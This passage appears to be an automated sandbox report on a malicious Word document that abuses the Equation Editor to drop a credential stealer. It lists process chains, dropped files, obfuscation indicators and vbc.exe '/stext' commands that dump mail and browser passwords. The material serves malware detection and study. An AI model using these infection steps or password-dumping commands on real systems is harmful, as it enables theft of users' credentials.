Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

SQL strings found in memory and binary data

Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp, vbc.exe	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp, vbc.exe	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp, vbc.exe	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp, vbc.exe	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp, vbc.exe	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp, vbc.exe	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Sample is known by Antivirus

Source: 280072109764552.doc

ReversingLabs: Detection: 31%

Spawns processes

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\name.exe 'C:\Users\user\AppData\Roaming\name.exe'
Source: C:\Users\user\AppData\Roaming\name.exe	Process created: C:\Users\user\AppData\Local\Temp\InstallUtil.exe C:\Users\user\AppData\Local\Temp\InstallUtil.exe
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\name.exe 'C:\Users\user\AppData\Roaming\name.exe'			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process created: C:\Users\user\AppData\Local\Temp\InstallUtil.exe C:\Users\user\AppData\Local\Temp\InstallUtil.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'			Jump to behavior

Uses an in-process (OLE) Automation server

Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Source: C:\Users\user\AppData\Roaming\name.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Checks if Microsoft Office is installed

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Submission file is bigger than most known malware samples

Source: 280072109764552.doc

Static file information: File size 2202571 > 1048576

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2363878816.00000000004E0000.00000004.00000001.sdmp
Source:	Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp, vbc.exe
Source:	Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp, vbc.exe
Source:	Binary string: InstallUtil.pdb source: name.exe, 00000004.00000002.2153168728.0000000006870000.00000004.00000001.sdmp, InstallUtil.exe

Data Obfuscation:

.NET source code contains potential unpacker

Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.cs	.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.cs	.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.cs	.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.cs	.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 6_2_00404837 GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,#17,MessageBoxA,

6_2_00404837

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_0003260D push cs; iretd		4_2_0003260F
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_00035610 push esi; iretd		4_2_0003561D
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_0003401C pushad ; retf		4_2_00034019
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_00035A34 push eax; retf		4_2_00035A5C
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_00035A47 push eax; retf		4_2_00035A5C
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_00034E93 pushad ; retf		4_2_00034ED4
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_00032894 push ds; iretd		4_2_00032898
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_00034D05 pushad ; retf		4_2_00034ED4
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_00036D50 push es; ret		4_2_00036D5D
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_00033955 push esi; retf		4_2_0003395E
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_00035992 push eax; retf		4_2_00035A5C
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_00033FDC pushad ; retf		4_2_00034019
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_000355E2 push 664C7BE7h; iretd		4_2_000355F0
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_00034FE7 push 680E75D9h; retf		4_2_00034FEC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_00411879 push ecx; ret		6_2_00411889
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_004118A0 push eax; ret		6_2_004118B4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_004118A0 push eax; ret		6_2_004118DC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 7_2_00442871 push ecx; ret		7_2_00442881
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 7_2_00442A90 push eax; ret		7_2_00442AA4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 7_2_00442A90 push eax; ret		7_2_00442ACC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 7_2_00446E54 push eax; ret		7_2_00446E61

.NET source code contains many randomly named methods

Source: 4.2.name.exe.30000.0.unpack, Sz9/n0P.cs

High entropy of concatenated method names: '.ctor', 'o5G', 'k2L', 'd4D', 'k5R', 'k5G', 'p5N', 'Lk2', 'c6F', 'Ri8'

Persistence and Installation Behavior:

Drops PE files

Source: C:\Users\user\AppData\Roaming\name.exe	File created: C:\Users\user\AppData\Local\Temp\InstallUtil.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\09867654270721.PDF[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\name.exe			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Changes the view of files in windows explorer (hidden files and folders)

Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe

Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\AppData\Roaming\name.exe

File opened: C:\Users\user\AppData\Roaming\name.exe\:Zone.Identifier read attributes | delete

Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 6_2_0040F64B memset,strcpy,memset,strcpy,strcat,strcpy,strcat,GetModuleHandleA,LoadLibraryExA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

6_2_0040F64B

Disables application error messsages (SetErrorMode)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
